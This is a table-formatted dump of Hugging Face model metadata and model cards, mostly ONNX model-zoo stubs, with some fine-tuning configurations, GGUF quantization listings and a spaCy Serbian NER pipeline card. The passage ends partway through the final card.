modelId
string | author
string | last_modified
timestamp[us, tz=UTC] | downloads
int64 | likes
int64 | library_name
string | tags
list | pipeline_tag
string | createdAt
timestamp[us, tz=UTC] | card
string |
---|---|---|---|---|---|---|---|---|---|
qingy2024/Ling-Mini-2.0-Identity
|
qingy2024
| 2025-09-23T18:48:01Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"feature-extraction",
"llama-factory",
"full",
"text-generation",
"conversational",
"custom_code",
"base_model:inclusionAI/Ling-mini-2.0",
"base_model:finetune:inclusionAI/Ling-mini-2.0",
"license:other",
"region:us"
] |
text-generation
| 2025-09-23T18:24:06Z |
---
library_name: transformers
license: other
base_model: inclusionAI/Ling-mini-2.0
tags:
- llama-factory
- full
model-index:
- name: outputs
results: []
pipeline_tag: text-generation
---
# Ling Mini 2.0 Identity
This model is a fine-tuned version of [inclusionAI/Ling-mini-2.0](https://huggingface.co/inclusionAI/Ling-mini-2.0) on the identity dataset (from LLaMA-Factory).
## Training procedure
Full fine tuning with DeepSpeed Zero3 offloading and 4 x A100 80GB. For a faster setup, you can use the `qingy1337/llamafactory-cu128:latest` docker image.
### Training hyperparameters
The following hyperparameters were used during training:
```
model_name_or_path: inclusionAI/Ling-mini-2.0
trust_remote_code: true
### method
stage: sft
do_train: true
finetuning_type: full
deepspeed: examples/deepspeed/ds_z3_config.json
### dataset
dataset: identity
template: bailing_v2
cutoff_len: 8192
max_samples: 10000000000
overwrite_cache: true
preprocessing_num_workers: 16
### output
output_dir: ./outputs/
logging_steps: 1
save_steps: 10000000000
save_only_model: true
plot_loss: true
overwrite_output_dir: true
report_to: wandb
run_name: Test-FT
### train
per_device_train_batch_size: 2
gradient_accumulation_steps: 1
learning_rate: 1.0e-6
num_train_epochs: 10.0
lr_scheduler_type: cosine
warmup_ratio: 0.2
bf16: true
ddp_timeout: 180000000
resume_from_checkpoint: null
```
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu128
- Datasets 4.0.0
- Tokenizers 0.22.1
|
onnxmodelzoo/mobilenetv2_120d_Opset16
|
onnxmodelzoo
| 2025-09-23T18:46:19Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:46:13Z |
---
language: en
license: apache-2.0
model_name: mobilenetv2_120d_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/mobilenet_v3_large_Opset18
|
onnxmodelzoo
| 2025-09-23T18:45:56Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:45:50Z |
---
language: en
license: apache-2.0
model_name: mobilenet_v3_large_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/mobilenet_v3_large_Opset16
|
onnxmodelzoo
| 2025-09-23T18:45:44Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:45:38Z |
---
language: en
license: apache-2.0
model_name: mobilenet_v3_large_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/mobilenet_v2_Opset16
|
onnxmodelzoo
| 2025-09-23T18:45:27Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:45:20Z |
---
language: en
license: apache-2.0
model_name: mobilenet_v2_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
galuis116/99cb632d-d56d-40af-a524-726b6403f2f7
|
galuis116
| 2025-09-23T18:43:13Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"llama",
"axolotl",
"generated_from_trainer",
"base_model:JackFram/llama-68m",
"base_model:adapter:JackFram/llama-68m",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:40:07Z |
---
library_name: peft
license: apache-2.0
base_model: JackFram/llama-68m
tags:
- axolotl
- generated_from_trainer
model-index:
- name: 99cb632d-d56d-40af-a524-726b6403f2f7
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
adapter: lora
base_model: JackFram/llama-68m
bf16: auto
chat_template: llama3
dataset_prepared_path: null
datasets:
- data_files:
- a6d1239a59b968ae_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_input: input
field_instruction: instruction
field_output: output
field_system: system
format: '{instruction} {input}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 4
flash_attention: false
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 4
gradient_checkpointing: false
group_by_length: false
hub_model_id: galuis116/99cb632d-d56d-40af-a524-726b6403f2f7
learning_rate: 0.0002
load_in_4bit: false
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 16
lora_dropout: 0.05
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 8
lora_target_linear: true
lr_scheduler: cosine
max_steps: 10
micro_batch_size: 2
mlflow_experiment_name: /tmp/a6d1239a59b968ae_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 1
optimizer: adamw_bnb_8bit
output_dir: /root/.cache/huggingface/hub/trained_repo
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 4
sequence_len: 512
special_tokens:
pad_token: </s>
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: offline
wandb_name: afb726d6-37e8-4e63-8423-3aaef8c91a46
wandb_project: Gradients-On-Demand
wandb_run: your_name
wandb_runid: afb726d6-37e8-4e63-8423-3aaef8c91a46
warmup_steps: 10
weight_decay: 0.0
xformers_attention: null
```
</details><br>
# 99cb632d-d56d-40af-a524-726b6403f2f7
This model is a fine-tuned version of [JackFram/llama-68m](https://huggingface.co/JackFram/llama-68m) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.0757
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 10
- training_steps: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 2.7976 | 0.0003 | 1 | 3.1003 |
| 3.0069 | 0.0009 | 3 | 3.0997 |
| 2.845 | 0.0017 | 6 | 3.0930 |
| 2.8102 | 0.0026 | 9 | 3.0757 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1
|
onnxmodelzoo/mixer_b16_224_in21k_Opset16
|
onnxmodelzoo
| 2025-09-23T18:38:07Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:37:48Z |
---
language: en
license: apache-2.0
model_name: mixer_b16_224_in21k_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
mradermacher/Qwen3-MoE-Tiny-GGUF
|
mradermacher
| 2025-09-23T18:36:40Z | 0 | 0 | null |
[
"region:us"
] | null | 2025-09-23T18:36:39Z |
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
<!-- ### quants: x-f16 Q4_K_S Q2_K Q8_0 Q6_K Q3_K_M Q3_K_S Q3_K_L Q4_K_M Q5_K_S Q5_K_M IQ4_XS -->
<!-- ### quants_skip: -->
<!-- ### skip_mmproj: -->
static quants of https://huggingface.co/keatone/Qwen3-MoE-Tiny
|
onnxmodelzoo/gcresnext26ts_Opset18
|
onnxmodelzoo
| 2025-09-23T18:36:27Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:36:21Z |
---
language: en
license: apache-2.0
model_name: gcresnext26ts_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
iamthe66epitaph/Erebus
|
iamthe66epitaph
| 2025-09-23T18:36:26Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:36:26Z |
---
license: apache-2.0
---
|
onnxmodelzoo/efficientnet_v2_m_Opset16
|
onnxmodelzoo
| 2025-09-23T18:35:08Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:34:50Z |
---
language: en
license: apache-2.0
model_name: efficientnet_v2_m_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/edgenext_xx_small_Opset18
|
onnxmodelzoo
| 2025-09-23T18:33:31Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:33:26Z |
---
language: en
license: apache-2.0
model_name: edgenext_xx_small_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/edgenext_xx_small_Opset16
|
onnxmodelzoo
| 2025-09-23T18:33:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:33:15Z |
---
language: en
license: apache-2.0
model_name: edgenext_xx_small_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/dpn68_Opset17
|
onnxmodelzoo
| 2025-09-23T18:32:58Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:32:51Z |
---
language: en
license: apache-2.0
model_name: dpn68_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/dpn68_Opset16
|
onnxmodelzoo
| 2025-09-23T18:32:50Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:32:42Z |
---
language: en
license: apache-2.0
model_name: dpn68_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
Arjenc/NN
|
Arjenc
| 2025-09-23T18:30:31Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:30:30Z |
---
license: apache-2.0
---
|
onnxmodelzoo/deit_base_patch16_224_Opset18
|
onnxmodelzoo
| 2025-09-23T18:24:41Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:24:14Z |
---
language: en
license: apache-2.0
model_name: deit_base_patch16_224_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
mradermacher/MD-Coder-Qwen3-8B-GGUF
|
mradermacher
| 2025-09-23T18:24:06Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"text-generation-inference",
"unsloth",
"qwen3",
"en",
"base_model:FredericFan/MD-Coder-Qwen3-8B",
"base_model:quantized:FredericFan/MD-Coder-Qwen3-8B",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-23T18:12:22Z |
---
base_model: FredericFan/MD-Coder-Qwen3-8B
language:
- en
library_name: transformers
license: apache-2.0
mradermacher:
readme_rev: 1
quantized_by: mradermacher
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
<!-- ### quants: x-f16 Q4_K_S Q2_K Q8_0 Q6_K Q3_K_M Q3_K_S Q3_K_L Q4_K_M Q5_K_S Q5_K_M IQ4_XS -->
<!-- ### quants_skip: -->
<!-- ### skip_mmproj: -->
static quants of https://huggingface.co/FredericFan/MD-Coder-Qwen3-8B
<!-- provided-files -->
***For a convenient overview and download list, visit our [model page for this model](https://hf.tst.eu/model#MD-Coder-Qwen3-8B-GGUF).***
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q2_K.gguf) | Q2_K | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q3_K_S.gguf) | Q3_K_S | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q3_K_M.gguf) | Q3_K_M | 1.0 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q3_K_L.gguf) | Q3_K_L | 1.1 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.IQ4_XS.gguf) | IQ4_XS | 1.1 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q4_K_S.gguf) | Q4_K_S | 1.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q4_K_M.gguf) | Q4_K_M | 1.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q5_K_S.gguf) | Q5_K_S | 1.3 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q5_K_M.gguf) | Q5_K_M | 1.4 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q6_K.gguf) | Q6_K | 1.5 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q8_0.gguf) | Q8_0 | 1.9 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.f16.gguf) | f16 | 3.5 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
Tanor/sr_jerteh_ner_nel
|
Tanor
| 2025-09-23T18:21:49Z | 0 | 0 | null |
[
"region:us"
] | null | 2025-09-23T18:21:48Z |
---
tags:
- spacy
- token-classification
language:
- sr
model-index:
- name: sr_jerteh_ner_nel
results:
- task:
name: NER
type: token-classification
metrics:
- name: NER Precision
type: precision
value: 0.90833429
- name: NER Recall
type: recall
value: 0.9064093018
- name: NER F Score
type: f_score
value: 0.9073707749
- task:
name: SENTS
type: token-classification
metrics:
- name: Sentences F-Score
type: f_score
value: 0.9694144864
---
| Feature | Description |
| --- | --- |
| **Name** | `sr_jerteh_ner_nel` |
| **Version** | `1.0.0` |
| **spaCy** | `>=3.8.7,<3.9.0` |
| **Default Pipeline** | `transformer`, `senter`, `ner`, `entity_linker` |
| **Components** | `transformer`, `senter`, `ner`, `entity_linker` |
| **Vectors** | 0 keys, 0 unique vectors (0 dimensions) |
| **Sources** | n/a |
| **License** | n/a |
| **Author** | [n/a]() |
### Label Scheme
<details>
<summary>View label scheme (10 labels for 1 components)</summary>
| Component | Labels |
| --- | --- |
| **`ner`** | `*`, `DEMO`, `EVENT`, `LOC`, `ORG`, `PERS`, `PRODUCT`, `ROLE`, `WORK`, `http://www.wikidata.org/entity/Q2829275` |
</details>
### Accuracy
| Type | Score |
| --- | --- |
| `SENTS_F` | 96.94 |
| `SENTS_P` | 96.96 |
| `SENTS_R` | 96.92 |
| `ENTS_F` | 90.74 |
| `ENTS_P` | 90.83 |
| `ENTS_R` | 90.64 |
| `NEL_MICRO_F` | 65.29 |
| `NEL_MICRO_R` | 52.82 |
| `NEL_MICRO_P` | 85.47 |
| `TRANSFORMER_LOSS` | 586650.79 |
| `SENTER_LOSS` | 37353.44 |
| `NER_LOSS` | 274797.35 |
| `ENTITY_LINKER_LOSS` | 6046.12 |
|
onnxmodelzoo/crossvit_base_240_Opset16
|
onnxmodelzoo
| 2025-09-23T18:19:46Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:19:13Z |
---
language: en
license: apache-2.0
model_name: crossvit_base_240_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
manifestai/powercoder-3b
|
manifestai
| 2025-09-23T18:19:14Z | 0 | 0 | null |
[
"safetensors",
"powercoder",
"license:cc-by-4.0",
"region:us"
] | null | 2025-09-23T15:11:35Z |
---
license: cc-by-4.0
---
PowerCoder-3B is a retrained StarCoder2-3B, metamorphasized to use power retention with p=2.
The retraining dataset was the-stack-smol-v2 with FIM, reweighted to sample Python more frequently.
To get the power retention kernels, use `pip install retention`.
|
onnxmodelzoo/crossvit_18_dagger_240_Opset17
|
onnxmodelzoo
| 2025-09-23T18:18:34Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:18:17Z |
---
language: en
license: apache-2.0
model_name: crossvit_18_dagger_240_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/crossvit_18_dagger_240_Opset16
|
onnxmodelzoo
| 2025-09-23T18:18:17Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:18:01Z |
---
language: en
license: apache-2.0
model_name: crossvit_18_dagger_240_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/crossvit_18_240_Opset17
|
onnxmodelzoo
| 2025-09-23T18:18:01Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:17:38Z |
---
language: en
license: apache-2.0
model_name: crossvit_18_240_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/crossvit_15_dagger_240_Opset17
|
onnxmodelzoo
| 2025-09-23T18:17:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:17:10Z |
---
language: en
license: apache-2.0
model_name: crossvit_15_dagger_240_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_xlarge_384_in22ft1k_Opset16
|
onnxmodelzoo
| 2025-09-23T18:11:30Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:09:57Z |
---
language: en
license: apache-2.0
model_name: convnext_xlarge_384_in22ft1k_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_tiny_in22k_Opset17
|
onnxmodelzoo
| 2025-09-23T18:09:57Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:09:40Z |
---
language: en
license: apache-2.0
model_name: convnext_tiny_in22k_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
lolzinventor/Qwen3-8B-BeyondReality
|
lolzinventor
| 2025-09-23T18:09:35Z | 0 | 0 | null |
[
"safetensors",
"qwen3",
"base_model:Qwen/Qwen3-8B",
"base_model:finetune:Qwen/Qwen3-8B",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T09:55:08Z |
---
license: apache-2.0
base_model:
- Qwen/Qwen3-8B
---

# Model Card for Beyond Reality
## Model Details
### Basic Information
- **Model Type:** Language Model
- **Base Model:** Qwen/Qwen3-8B
- **Training Type:** Fine-tuned
- **Version:** 1.0
- **Language(s):** English
### Model Architecture
- Architecture: Qwen/Qwen3-8B
- Parameters: 8 billion
- Training Procedure: Fine-tuned on a custom dataset of interactive fiction scenarios
## Intended Use
- **Primary intended uses:** Interactive storytelling, text-based adventure games, narrative exploration
- **Primary intended users:** Game developers, writers, AI researchers, interactive fiction enthusiasts
## Limitations and Bias
- Limited to 5-6 coherent actions in sequence before potential degradation
- May exhibit biases present in the original LLaMA model and the fine-tuning dataset
- Not suitable for factual information retrieval or real-world decision making
## Training Data
Fine-tuned on a proprietary dataset of interactive fiction scenarios, featuring:
- Multi-choice action systems (options A-D)
- Custom user-defined actions (E+)
- Various narrative genres and settings
## Performance and Evaluation
- Maintains coherence for 5-6 sequential actions on average
- Evaluated primarily through user testing and narrative consistency
- Already starting as a small model, quantization noticeably reduces the ability of the model to follow the multiple-choice narrative
## Ethical Considerations
- Model outputs are fictional and should not be used as a source of factual information
- Users should be aware of potential biases in generated content
|
onnxmodelzoo/convnext_tiny_384_in22ft1k_Opset18
|
onnxmodelzoo
| 2025-09-23T18:08:45Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:08:33Z |
---
language: en
license: apache-2.0
model_name: convnext_tiny_384_in22ft1k_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_tiny_384_in22ft1k_Opset16
|
onnxmodelzoo
| 2025-09-23T18:08:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:08:09Z |
---
language: en
license: apache-2.0
model_name: convnext_tiny_384_in22ft1k_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
mradermacher/Qwen2.5-HumanLike-DPO-GGUF
|
mradermacher
| 2025-09-23T18:07:33Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"en",
"base_model:littletramp/Qwen2.5-HumanLike-DPO",
"base_model:quantized:littletramp/Qwen2.5-HumanLike-DPO",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-23T17:58:17Z |
---
base_model: littletramp/Qwen2.5-HumanLike-DPO
language:
- en
library_name: transformers
mradermacher:
readme_rev: 1
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
<!-- ### quants: x-f16 Q4_K_S Q2_K Q8_0 Q6_K Q3_K_M Q3_K_S Q3_K_L Q4_K_M Q5_K_S Q5_K_M IQ4_XS -->
<!-- ### quants_skip: -->
<!-- ### skip_mmproj: -->
static quants of https://huggingface.co/littletramp/Qwen2.5-HumanLike-DPO
<!-- provided-files -->
***For a convenient overview and download list, visit our [model page for this model](https://hf.tst.eu/model#Qwen2.5-HumanLike-DPO-GGUF).***
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q2_K.gguf) | Q2_K | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q3_K_S.gguf) | Q3_K_S | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q3_K_L.gguf) | Q3_K_L | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.IQ4_XS.gguf) | IQ4_XS | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q5_K_S.gguf) | Q5_K_S | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q5_K_M.gguf) | Q5_K_M | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q6_K.gguf) | Q6_K | 1.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q8_0.gguf) | Q8_0 | 1.7 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.f16.gguf) | f16 | 3.2 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
onnxmodelzoo/convnext_nano_Opset18
|
onnxmodelzoo
| 2025-09-23T18:06:52Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:06:44Z |
---
language: en
license: apache-2.0
model_name: convnext_nano_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_nano_ols_Opset18
|
onnxmodelzoo
| 2025-09-23T18:06:26Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:06:18Z |
---
language: en
license: apache-2.0
model_name: convnext_nano_ols_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_nano_ols_Opset16
|
onnxmodelzoo
| 2025-09-23T18:06:08Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:05:56Z |
---
language: en
license: apache-2.0
model_name: convnext_nano_ols_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_base_384_in22ft1k_Opset17
|
onnxmodelzoo
| 2025-09-23T18:04:04Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:03:33Z |
---
language: en
license: apache-2.0
model_name: convnext_base_384_in22ft1k_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
Gems234/Alisia-7B-it
|
Gems234
| 2025-09-23T18:03:15Z | 126 | 1 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"text-generation-inference",
"unsloth",
"qwen",
"code",
"question-answering",
"fact-cheking",
"reasoning",
"en",
"base_model:Gems234/Alisia-7B-Instruct-V1.0-private",
"base_model:finetune:Gems234/Alisia-7B-Instruct-V1.0-private",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
question-answering
| 2025-09-16T07:37:21Z |
---
base_model: Gems234/Alisia-7B-Instruct-V1.0-private
tags:
- text-generation-inference
- transformers
- unsloth
